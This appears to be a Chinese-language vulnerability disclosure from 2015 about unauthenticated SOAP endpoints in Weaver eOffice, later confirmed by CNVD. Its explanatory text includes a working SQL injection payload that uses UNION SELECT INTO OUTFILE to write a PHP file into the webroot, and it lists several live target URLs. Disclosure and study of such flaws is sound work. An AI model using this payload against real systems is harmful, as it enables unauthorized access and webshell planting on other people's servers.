);$server->register( "SetMessageRead", array( "userID" => "xsd:string", "messageIDStr" => "xsd:string", "fromUserID" => "xsd:string" ), array( ), "urn:EofficeService", "urn:EofficeService#SetMessageRead", "rpc", "encoded", "SetMessageRead" );$server->register( "CreateFile", array( "subject" => "xsd:string", "attachmentIDStr" => "xsd:string", "attachmentNameStr" => "xsd:string", "userID" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#CreateFile", "rpc", "encoded", "CreateFile" );$server->wsdl->addComplexType( "newVersionReturnArray", "complexType", "struct", "all", "", array( "version" => array( "name" => "version", "type" => "xsd:string" ), "readme" => array( "name" => "readme", "type" => "tns:newVersionReadmeArray" ) ) );$server->wsdl->addComplexType( "newVersionReadmeArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:newVersionReadme[]" ) ), "tns:newVersionReadme" );$server->wsdl->addComplexType( "newVersionReadme", "complexType", "struct", "all", "", array( "subject" => array( "name" => "subject", "type" => "xsd:string" ), "describe" => array( "name" => "describe", "type" => "xsd:string" ), "image" => array( "name" => "image", "type" => "xsd:string" ) ) );$server->register( "GetNewVersion", array( ), array( "return" => "tns:newVersionReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetNewVersion", "rpc", "encoded", "GetNewVersion" );$server->register( "Attend", array( "userID" => "xsd:string", "deptID" => "xsd:string", "privID" => "xsd:string", "checkType" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#Attend", "rpc", "encoded", "Attend" );$server->register( "CheckIsSignIn", array( "userID" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#CheckIsSignIn", "rpc", "encoded", "CheckIsSignIn" );$server->service( $HTTP_RAW_POST_DATA );?>
1.这个文件内容,直到最后也没有任何auth控制,也就是说我们可以通过未授权访问了2.传递参数HTTP_RAW_POST_DATA 这个不走gpc为了方便期间,我这里偷个懒,对http://eoffice.sccm.cn/attachment/mysql_log.sql这个站点mysql配置了抓取
测试完了,删除即可然后我再次偷懒,下载了wsdigger软件,进行webservice的wsdl文件解析
首先我们看信息泄露:
然后我们看sql注射,这里我举两个例子就可以了,因为这个里面的sql语句都带有\r\n\t\t\t\做换行,这种的注释,直接/*就可以做到,其他的都不管用先看UserLogin 这个借口:里面的 userAccount 为admin' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,10,1,2,3,4,5,6,7,8,9,10,10,1,2,3,4,5,6,7,8,9,10,10,1,2,3,4,5,6,7,8,9,10,1,'wooyun' into outfile 'D:/eoffice/webroot/attachment/wooyun.php'#
访问:http://eoffice.sccm.cn/attachment/wooyun.php
下来看看 第二种sql注射:测试createFile这个接口:
当你点击invoke时候就会发成延迟,我们抓取到的sql语句为:
ok 统计一下有10处,案例不多举例子了http://oa.sccm.cn//webservice/eoffice.wsdl.php?wsdlhttp://oa.vma.cn/webservice/eoffice.wsdl.php?wsdlhttp://eoffice.sccm.cn/webservice/eoffice.wsdl.php?wsdlhttp://eoffice8.weaver.cn:8028/webservice/eoffice.wsdl.php?wsdl
危害等级:高
漏洞Rank:11
确认时间:2015-07-10 11:56
CNVD确认并复现所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件(和电话)通报,由其后续提供解决方案并协调相关用户单位处置。
暂无